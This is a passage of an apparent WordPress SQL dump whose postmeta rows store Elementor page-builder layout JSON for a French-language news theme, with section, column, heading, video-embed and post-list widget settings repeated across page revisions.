0\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"634cd6a\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=9uOETcuFjbE\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Derniers articles\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"vmz1rkd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":1},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":1},\"use_view_post_list_1\":\"\",\"use_category_post_list_1\":\"\",\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":13},\"use_meta_post_list_1\":\"\",\"post_list_1_excerpt_word\":2,\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.3},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list1_read_more_font_weight\":\"500\",\"post_list1_margin_bottom\":10,\"width\":\"600\",\"height\":\"600\",\"horizontal_col_select\":\"column-2\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1384,483,'_elementor_version','0.4'),(1385,484,'_elementor_edit_mode','builder'),(1386,484,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"634cd6a\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=9uOETcuFjbE\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Derniers articles\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"vmz1rkd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":1},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":1},\"use_view_post_list_1\":\"\",\"use_category_post_list_1\":\"\",\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":13},\"use_meta_post_list_1\":\"\",\"post_list_1_excerpt_word\":2,\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.3},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list1_read_more_font_weight\":\"500\",\"post_list1_margin_bottom\":10,\"width\":\"600\",\"height\":\"600\",\"horizontal_col_select\":\"column-2\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1387,484,'_elementor_version','0.4'),(1389,485,'_elementor_edit_mode','builder'),(1390,485,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit